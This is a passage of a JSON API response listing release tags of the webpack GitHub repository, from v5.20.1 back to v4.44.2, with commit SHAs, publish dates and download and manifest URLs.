purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000